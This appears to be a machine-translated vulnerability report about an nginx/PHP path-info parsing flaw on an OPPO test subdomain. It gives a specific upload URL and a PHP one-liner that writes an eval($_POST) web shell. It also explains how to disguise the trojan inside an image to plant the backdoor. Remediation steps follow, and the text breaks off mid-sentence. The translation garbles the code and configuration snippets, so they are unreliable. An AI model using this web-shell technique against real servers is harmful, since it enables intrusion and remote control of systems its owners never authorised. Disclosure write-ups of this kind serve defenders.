Nginx resolution of OPPO sub-station can be granted permissions (including repair solutions)

URL: http://test.myoppo.com/bluesword/blue_sword.php? T = t_upload & Action = PostMsg

Someone has previously uploaded this file, but the Administrator has completed fixing the vulnerability .. Although the PHP file is forbidden, you can continue to win the file using resolution ..

You have used DNS to win the shell.

DAMA: <? Fputs (fopen ("and. php", "w"), "<? Eval (\ $ _ POST [***]);?> ")?>

After merging a Trojan and an image, upload the trojan directly after adding 1.php to automatically generate and. php.

Solution:
1. Set cgi. fix_pathinfo of php. ini to 0 and restart php. It is the most convenient, but you need to evaluate the impact of modification settings.

2. Add the following content to the nginx vhost configuration and restart nginx. It is also convenient when there are few vhosts.

If ($ fastcgi_script_name ~ \ .. * \/. * Php ){

Return 403;

}

3. Do not upload directories to interpret PHP programs. You do not need to change the webserver. If there are many vhosts and servers, the difficulty will increase sharply in the short term. We recommend that you use